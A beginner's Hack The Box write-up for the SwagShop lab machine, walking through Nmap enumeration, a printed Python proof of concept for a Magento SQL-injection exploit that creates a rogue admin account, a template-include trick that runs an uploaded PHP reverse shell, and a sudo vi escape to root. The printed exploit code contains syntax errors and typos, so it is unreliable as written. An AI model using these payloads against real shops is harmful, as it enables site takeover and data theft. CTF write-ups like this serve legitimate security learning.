Hack The Box: SwagShop Write-up

 swagshop-banner.png

Overview

This writeup details the process I used to complete the SwagShop Hack the Box machine. Please be aware that this was not only the first Hack the Box machine I had ever attempted, but also the first time I had attacked any sort of CTF machine. My methodology, note-taking, and resulting documentation was very unrefined, if not completely non-existent, for this machine. I considered going back through this machine to document the process in a manner more in line with my current methodology, then updating this writeup to be more cohesive with the others on this site. I ultimately decided there was some degree of value in leaving this writeup as it is. It can be compared to the more recent writeups, highlighting the development of my skills and methodology over time.

Attack

Exploiting Magento CMS

My first step was to open up Metasploit. Since this was my first time running it, I needed to initialize the database. Once completed, I ran an Nmap scan against the target host.

        
msfdb init
db_namp -v -sV 10.10.10.140

Once the host was scanned, I checked the database to see what services had been detected as open.

        
services
Services
========

host          port    proto   name    state     info
----          ----    -----   ----    -----     ----
10.10.10.140  22      tcp     ssh     open      OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 Ubuntu Linux; protocol 2.0
10.10.10.140  80      tcp     http    open      Apache/2.4.18 (Ubuntu)

Since I saw a web server on TCP port 80, I decided to attempt using wmap to enumerate the site directory structure. This resulted in some interesting information, including an XML file that had SQL credentials. I spent some time attempting to discover a way to abuse the credentials, but this turned out to be a dead-end.

At this point I decided to navigate to the web server running on TCP port 80 in my web browser. Branding was prominently displayed and identified the site as being built with Magento eCommerce CMS. The copyright footer was dated 2014, and after poking around the open FTP directories I was able to find installation notes that listed the exact version of the CMS software. Armed with the version I was able to find this Python RCE PoC. The code, after my edits, can be seen below.

    
#Thanks to
# Zero cool, code breaker ICA, TEam indishell, my father, rr mam, jagriti and DON
import requests
import base64
import sys

target = "http://10.10.10.140/"
if not target.startswith("http"):
target = "http://" + target
if target.endswith("/"):
target = target[:-1]

target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/":
q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO '`admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`rp_token`,`rp_token_created_at`) VALUES (`Firstname`,`Lastname`,`email@example.com`,`plsnodelet`,@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW()):
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0, 'U',(SELECT user_id FROM admin__user WHERE username = 'plsnodelet'),'Firstname');
"""

query = q.replace("\n", "").format(username="plsnodelet", password="forme")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_searc_grid output=getCsvFile}}
r = requests.post(target_url,
          data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                "filter": base64.b64encode(pfilter),
                "forwarded": 1})

if r.ok:
print "WORKED"
print "Check {0}/admin with creds plsnodelet:forme".format(target)
else:
print "DID NOT WORK DUDE"

I did have to change the target_url variable manually, the original script version had this variable hard-coded to a different IP address. I also had to insert /index.php in to the get_url variable in order to properly match the target environment.

Running this script against the target resulted in an admin account being created for Magento CMS. I verified that this account was created by logging in to the Magento CMS admin portal with the defined credentials. At this point I knew I needed to come up with a way to pop a shell, but I wasn't sure how to accomplish that. I searched for Magento vulnerabilities and discovered some documentation on the Froghopper RCE technique. I initially tried to utilize this technique by adding the PHP remote shellcode in the exif data of an image file, but I couldn't successfully trigger the shellcode. I wound up just saving the pentestmonkey PHP reverse shell script with a .jpg file extension in order to upload it to the target.

Once I had uploaded the file to the target, I was able to use the Magento CMS email template preview to execute the PHP payload. I accomplished this by entering a specific string in the email body before clicking the preview button.

    
{{block type='core/template' template='../../../../../../media/catalog/category/filename.jpg'}}

After inserting the above line, ensuring my Netcat listener was running on the correct port, and clicking the preview button, I caught the reverse PHP shell on my listener. I was running in the user context ofwww-data, but I was still able to grab the contents of /home/haris/user.txt.

Escalation of Privilege

I had a very difficult time figuring out how to get a full shell to get root on this box. Since this was my first box I did not have any experience with any of the techniques for upgrading from limited to full shells. I eventually figured out that I could execute the following commands in a limited shell in order to upgrade to a full pty shell without relying on Python or other interpreters.

        
bash -i
script /dev/null

One of things I did after gaining an interactive shell was to run sudo -l to see if the user I was impersonating had permissions to run any commands as root with sudo. The output from that command included a line that told me that user www-data was able to run vi as root with sudo, as long as the file being opened was in the /var/www/html/ directory path. I then opened a new test file with vi and used the well-known escape method to run an arbitrary command as root.

        
sudo vi /var/www/html/test.txt
        
    
        
!cat /root/root.txt

After executing the above command from within vi the root flag was printed to my terminal.

FINAL THOUGHTS

The major issue I had while completing this machine was figuring out how to actually run sudo vi /var/www/html/test.txt. I found out that user www-data had the ability to execute vi with sudo pretty early on in my enumeration process, but the non-interactive shell I was working in kept preventing me from being able to successfully use the command. The process of trying to figure out how to fix the issue led me down some pretty deep rabbit holes because I didn't know the exact phrasing to describe what I needed to accomplish. Once I figured out how to upgrade to an interactive shell without relying on Python being installed on the target machine I was quickly able to finish the box.